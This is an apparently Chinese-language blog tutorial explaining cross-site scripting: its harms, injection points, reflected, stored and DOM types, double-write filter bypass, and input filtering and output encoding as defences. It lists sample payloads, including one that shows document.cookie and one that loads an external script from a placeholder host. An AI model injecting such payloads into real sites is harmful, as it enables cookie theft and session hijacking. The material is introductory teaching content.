首页 > 其他分享 >XSS漏洞

XSS漏洞

时间:2024-06-23 23:32:06浏览次数:24  
标签:hacker XSS DOM 用户 alert 漏洞 HTML

XSS漏洞

什么是XSS?

跨站脚本攻击,Cross-Site Scripting, 为了和CSS(层叠样式表)区分开来,把第一个字母C改成了X,也就是现在所说的XSS攻击。

XSS的危害

窃取cookie, 劫持对话,网络钓鱼,放马挖矿,广告刷流量,劫持后台,篡改页面,传播蠕虫,内网扫描。

XSS作用位置

用户输入作为script标签内容
用户输入作为HTML注释内容
用户输入作为HTML标签的属性名
用户输入作为HTML标签的属性值
用户输入作为HTML标签的名字
直接插入到CSS里

XSS脚本

<script>alert("hacker")</script>				#弹出hacker
<script>alert(/hacker/)</script>				#弹出hacker
<script>alert(1)</script>						#弹出1, 对于数字可以不用引号
<script>alert(document.cookie)</script>			弹出cookie
<script src=http://XXX.com/xss.js></script>		#引用外部的xss

XSS的分类

反射型XSS

反射型XSS是非持久性、参数型跨站脚本。反射型XSS的JS代码在web应用的参数(变量)中,如搜索框的反射型XSS。

image

存储型XSS

存储型XSS是持久性跨站脚本,持久性体现在xss代码不是在某个参数(变量)中,而是写进数据库或文件等可以永久保存数据的介质中。存储型XSS通常发生在留言板等地方。

image

DOM型XSS

定义:owasp关于DOM型XSS的定义是基于DOM的XSS是一种XSS攻击,其中攻击的payloadi由于修改受害者浏览器页面的DOM树而执行的。

image

XSS常见绕过

双写绕过

网站中设置黑名单,检测到黑名单中的字符串,会被替换掉,从而规避掉恶意代码,这种情况可以视情况而定,选择合适的双写格式进行检查绕过。

XSS防范

防范办法

对用户的输入(和URL参数)进行过滤,对输出进行html编码,也就是对用户提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。

标签:hacker,XSS,DOM,用户,alert,漏洞,HTML
From: https://www.cnblogs.com/tlomlyiyi/p/18263893

相关文章

  • 【网络安全的神秘世界】SQL注入漏洞
    ......
  • 【漏洞复现】WordPress MasterStudy LMS插件 SQL注入漏洞(CVE-2024-1512)
    0x01产品简介WordPress和WordPressplugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPressplugin是一个应用插件。0x02漏洞概述WordPressPluginMasterStudyLMS3.2.5版本......
  • s2-045漏洞还原
    1.环境准备,本地server2003环境对应网址http://192.168.116.112:8080/struts2-showcase/showcase.action2.使用在线工具包扫描漏洞信息输入对应的url检测发现存在对应漏洞选择对应漏洞,可执行对应系统命令 上传自带木马文件(复制tmp.jsp内容,上报到对应目录下C:\jspstu......
  • 永恒之蓝漏洞复现
    永恒之蓝漏洞复现漏洞背景:永恒之蓝(ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及......
  • 网络安全 文件上传漏洞-13 第十三关 Pass-13
    点击第十三关,并点击选择显示源码。可以看到,题目要求我们上传一个图片马到服务器:functiongetReailFileType($filename){$file=fopen($filename,"rb");$bin=fread($file,2);//只读2字节fclose($file);$strInfo=@unpack("C2chars",$bin);......
  • JeecgBoot-queryFieldBySql-远程命令执行-RCE漏洞
    影响范围:3.0.0<=jeecg-boot<=3.5.32.4.x<=jeecg-boot<=2.4.6POC:POST/jeecg-boot/jmreport/queryFieldBySqlHTTP/1.1Host:ipPragma:no-cacheCache-Control:no-cacheSec-Ch-Ua:"GoogleChrome";v="125","Chromium&q......
  • 栈帧浅析,堆栈漏洞概述——【太原理工大学软件安全期末补充】
    在上一篇文章中我说实验一不重要,确实没必要完全按照实验内容逐字逐句理解,但是这里我们补充一个知识点栈帧(StackFrame)是计算机程序执行过程中,调用栈(CallStack)中的一个单元,它包含了函数调用时的上下文信息。每当一个函数被调用时,一个新的栈帧就会被创建并被推入调用栈。栈帧......
  • Weaver E-Office v9.5 文件上传漏洞(CVE-2023-2648)
    前言CVE-2023-2648是一个在WeaverE-Office9.5版本中发现的严重漏洞。此漏洞位于文件/inc/jquery/uploadify/uploadify.php中,通过操控Filedata参数,可以进行不受限制的文件上传。这一漏洞允许攻击者上传可能包含危险类型的文件,并在应用程序环境中执行。该漏洞可以通过......
  • 文件包含漏洞-伪协议
    目录一、file://协议1.介绍2.利用条件3.利用方法二、http://协议1.介绍三、php://协议1.介绍2.php://input方法⑴前提条件 ⑵利用包3.php://filte方法⑴前提条件⑵格式四、案例(包含本地文件)1.包含敏感信息 2.包含图片 3.包含日志文件一、file://协议1......
  • 容器镜像安全:安全漏洞扫描神器Trivy
    目录一.系统环境二.前言三.Trivy简介四.Trivy漏洞扫描原理五.利用trivy检测容器镜像的安全性六.总结一.系统环境本文主要基于Dockerversion20.10.14和Linux操作系统Ubuntu18.04。服务器版本docker软件版本CPU架构Ubuntu18.04.5LTSDockerversion20.10.14x86_......